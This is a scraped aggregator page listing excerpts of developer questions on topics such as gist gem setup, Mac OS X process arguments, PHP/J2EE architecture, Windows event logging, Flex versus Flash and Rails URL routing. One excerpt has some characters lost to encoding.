  setup I'm following defunkt's gist setup guide. [smotchkkiss ~]$ sudo gem install gist [smotchkkiss ~]$ git config --global github.user "my github name" [smotchkkiss ~]$ git config --global github.token "my github token" [smotchkkiss ~]$ echo "puts 'hello, gist.'" > hello.rb [smotchkkiss ~]$ gist hello.rb output Usage: open [-e] [-t] [-f] [-W] [-n] [-g] [-h] [-b <bundle identifier>] [-a <application>] [filenames] Help: Open opens files from a shell. By default, opens each file using the default application for that file. If the file is in the form of a URL, the file will be opened as a URL. Options: -a Opens with the specified application. -b Opens with the specified application bundle identifier. -e Opens with TextEdit. -t Opens with default text editor. -f Reads input from standard input and opens with TextEdit. -W, --wait-apps Blocks until the used applications are closed (even if they were already running). -n, --new Open a new instance of the application even if one is already running. -g, --background Does not bring the application to the foreground. -h, --header Searches header file locations for headers matching the given filenames, and opens them. return value nil help! nil return value? What gives? No new gist appears in my My Gists page on github.

  Read the article

• Mac OS X: Getting detailed process information (specifically its launch arguments) for arbitrary run

  - by Jasarien

  I am trying to detect when particular applications are launched. Currently I am using NSWorkspace, registering for the "did launch application" notification. I also use the runningApplications method to get apps that are currently running when my app starts. For most apps, the name of the app bundle is enough. I have a plist of "known apps" that I cross check with the name of that passed in the notification. This works fine until you come across an app that acts as a proxy for launching another application using command line arguments. Example: The newly released Portal on the Mac doesn't have a dedicated app bundle. Steam can create a shortcut, which serves as nothing more than to launch the hl2_osx app with the -game argument and portal as it's parameter. Since more Source based games are heading to the Mac, I imagine they'll use the same method to launch, effectively running the hl2_osx app with the -game argument. Is there a nice way to get a list of the arguments (and their parameters) using a Cocoa API? NSProcessInfo comes close, offering an `-arguments' method, but only provides information for its own process... NSRunningApplication offers the ability to get information about arbitrary apps using a PID, but no command line args... Is there anything that fills the gap between the two? I'm trying not to go down the route of spawning an NSTask to run ps -p [pid] and parsing the output... I'd prefer something more high level.

  Read the article

• How to build n-layered web architecture with PHP?

  - by Alex

  I have a description and design of a website and I need to redesign it to allow for new requirements. The website's purpose is the offering of government's contracts and bidding opportunities for different businesses.I'm dealing with the 3-tier architecture PHP website comprising of the user-interface tier(client's web browser),business logic layer(Apache web server with PHP engine in it and a couple of applications running within a web server as well) and a database layer(local mysql database). Now,i need to redesign it to su???rt distributed n-tier architecture and specify how I would go about it.After long hours of research i came to this solution: business logic should be separated into presentation and purely business logic tier to allow for n-layer architecture(user-interface,presentation tier,b.logic and data tier).I have decided to use ??? just for the presentation(since the original existing website is in PHP) and use it within apache web server.In the business logic i want to use J2?? implementation technology instead of implementing it in PHP(i.e using Zend app.server and smarty template) cz J2EE can provide much more essential container services which are essential for business logic,its robustness,maintainability and different critical business operations which will be carried out by the g?v?rnment's website.So,particularly,i want to use J??ss app.server with ?J? business objects in it which would provide all the b.logic in java and would interact with the database and so forth.In order to connect PHP on a web server with java on app.server i'm gonna use PHP/Java bridge API (or maybe Quercus or SOAP is better?).Finally,i have my data tier with mysql which will communicate with b.logic via JD??.Payment system application in ???.server is gonna use S??? to talk with credit card company. From your professional point of view,does it sound like a good way of redesigning the original website to allow for n-tier architecture considering the specifics of the website and the criticality of its operations?(payment system is included in it)or u would personally prefer to use PHP business objects for business logic as well instead of J2EE?If you have any wiser recommendation or some alternative,please let me know what is right or wrong in my current solution. H??? to hear your professional advice very s??n (I'm new to the area of web development) Thanks in advance

  Read the article

• Windows Forms Event Log

  - by blu

  I am writing to the event log from my Windows Forms application running on Windows 7 and am getting this message in the event log: The description for Event ID X from source Application cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer. If the event originated on another computer, the display information had to be saved with the event. The following information was included with the event: Exception Details the message resource is present but the message is not found in the string/message table My logging code is: public void Log(Exception exc) { EventLog.WriteEntry( "Application", exc.ToString(), EventLogEntryType.Error, 100); } My logging on Windows Forms is usually to a DB, but in this case decided to use the event log. I usually use the event log in ASP.NET applications, but those are on XP Pro locally and Windows Server 2003 on the web boxes. Is this a Windows 7 thing or a Windows Forms thing, and what should I do to fix this? Thanks.

  Read the article

• Ability to draw and record a signature as part of a form - iphone

  - by mustic

  Apolgies in advance for any errors.. new to this and am not a developer/programmer.. just have some basic unix experience. I have searched the web and struggled to find a solution to my problem when I stumbled onto this website which maybe suggested that there is a solution to my question. For work i use a windows mobile device because we have to get customers to sign and form after a customer visit. the signature being very important. On the windows device i use the notes application and am able to record details and obtain/record (using draw) a customer signature. the form is then emailed back to HQ. The format being used is a *.pwi I have downloaded and paid for several applications for my iphone which is my preferred device and cant quite find anything that does both. the critical bit here is to be able to take a signature on the phone, save the doc in a format such as .txt, .doc or .pdf where i can control the file name then be able to email back to HQ. Am i asking too much? I hope that makes sense.. Any help would be much appreciated many thanks in advance

  Read the article

• Emulating a web browser

  - by Sean

  Hello, we are tasked with basically emulating a browser to fetch webpages, looking to automate tests on different web pages. This will be used for (ideally) console-ish applications that run in the background and generate reports. We tried going with .NET and the WatiN library, but it was built on a Marshalled IE, and so it lacked many features that we hacked in with calls to unmanaged native code, but at the end of the day IE is not thread safe nor process safe, and many of the needed features could only be implemented by changing registry values and it was just terribly unflexible. Proxy support JavaScript support- we have to be able to parse the actual DOM after any javascript has executed (and hopefully an event is raised to handle any ajax calls) Ability to save entire contents of page including images FROM THE loaded page's CACHE to a separate location ability to clear cookies/cache, get the cookies/cache, etc. Ability to set headers and alter post data for any browser call And for the love of drogs, an API that isn't completely cryptic Languages acceptable C++, C#, Python, anything that can be a simple little console application that doesn't have a retarded syntax like Ruby. From my own research, and believe me I am terrible at google searches, I have heard good things about WebKit... would the Qt module QtWebKit handle all these features?

  Read the article

• What is Adobe Flex? Is it just Flash II?

  - by Adam Davis

  Question Alright, I'm confused by all the buzzwords and press release bingo going on. What is the relationship between flash and flex: Replace flash (not really compatible) Enhance flash The next version of flash but still basically compatible Separate technology altogether ??? If I'm starting out in Flash now, should I just skip to Flex? Follow up Ok, so what I'm hearing is that there's three different parts to the puzzle: Flash The graphical editor used to make "Flash Movies", ie it's an IDE that focuses on the visual aspect of "Flash" (Officially Flash CS3?) The official name for the display plugins (ie, "Download Flash Now!") A general reference to the entire technology stack In terms of the editor, it's a linear timeline based editor, best used for animations with complex interactivity. Actionscript The "Flash" programming language Flex An Adobe Flash IDE that focuses on the coding/programming aspect of "Flash" (Flex Builder?) A Flash library that enhances Flash and makes it easier to program for (Flex SDK?) Is not bound to a timeline (as the Flash IDE is) and so "standard" applications are more easily accomplished. Is this correct?

  Read the article

• Creating a window manager type overlay for Mac OS X

  - by zorg1379

  I want to make my own window manager for OS X, or at least give it the appearance of a new one. I have many designs written down in a book, and would like to implement them. These include altering, or even completely removing, menu bars, creating entirely new guis for switching applications, etc. I know that OS X does not have a window manager, and that basically the functions that an X11 window manager would perform are done by Carbon, Cocoa, the Dock application, and the window server. I've read that it would take an incredible amount of reverse engineering to write my own api, etc. at the hardware level. I am still not that good at programming though, and don't have that kind of time. That's why I was thinking of maybe running an application on top of OS X that will function like a separate window manager - and do everything that the normal OS GUI / window manager would do. Is this possible? For example: making a custom button that would appear upon a certain key combination, that could be clicked to access a document viewer, change the time, minimize a window, etc. Is there some way to access functionality to basic tasks / actions like this without using the default OS X button controls, and implementing them with my own GUI? I am talking about more than a simple theme change, I want to completely change the user experience. This means that this application would be run in a full screen mode that blocks out default OS X menu bars. I've heard something about using graphics architectures to plug in your own window manager? Would this be an option too? If so, how would I go about doing that? Thank you,

  Read the article

• How to get a handle on all this middleware?

  - by jkohlhepp

  My organization has recently been wrestling the question of whether we should be incorporating different middleware products / concepts into our applications. Products we are looking at are things like Pegasystems, Oracle BPM / BPEL, BizTalk, Fair Isaac Blaze, etc., etc., etc. But I'm having a hard time getting a handle on all this. Before I go forward with evaluating the usefulness (positive or negative) of these different products I'm trying to get an understanding of all the different concepts in this space. I'm overwhelmed with an alphabet soup of BPM, ESB, SOA, CEP, WF, BRE, ERP, etc. Some products seem to cover one or more of those aspects, others focus on doing one. The terms all seem very ambiguous and conflated with each other. Is there a good resource out there to get a handle on all these different middleware concepts / patterns? A book? A website? An article that sums it up well? Bonus points if there is a resource that maps the various popular products into which pattern(s) they address. Thanks, ~ Justin

  Read the article

• How do I create Twitter style URLs for my app - Using existing application or app redesign - Ruby on

  - by bgadoci

  I have developed a blog application of sorts that I am trying to allow other users to take advantage of (for free and mostly for family). I wondering if the authentication I have set up will allow for such a thing. Here is the scenario. Currently the application allows for users to sign up for an account and when they do so they can create blog posts and organize those posts via tags. The application displays no data publicly (another words, you have to login to see anything). To gain access you have to create an account and even after you do, you cannot see anyone else's information as the applications filters using the current_user method and displays in the /posts/index.html.erb page. This would be great if a user only wanted to blog and share it with themselves, not really what I am looking for. My question has two parts (hopefully I won't make anyone mad by not putting these into two questions) Is it possible for a particular users data to live at www.myapplication.com/user without moving everything to the /user/show.html.erb file? Is it possible to make some of that information (living at the URL) public but still require login for create and destroy actions. Essentially, exactly like twitter. I am just curious if I can get from where I am (using the current_user methods across controllers to display in /posts/index.html.erb) to where I want to be. My fear is that I have to redesign the app such that the user data lives in the /user/show.html.erb page. Thoughts? UPDATE: I am using Clearance for authentication by Thoughtbot. I wonder if there is something I can set in the vendored gem path to represent the /posts/index.html.erb code as the /user/id code and replace id with the user name.

  Read the article

< Previous Page | 580 581 582 583 584 585 586 587 588 589 590 591  | Next Page >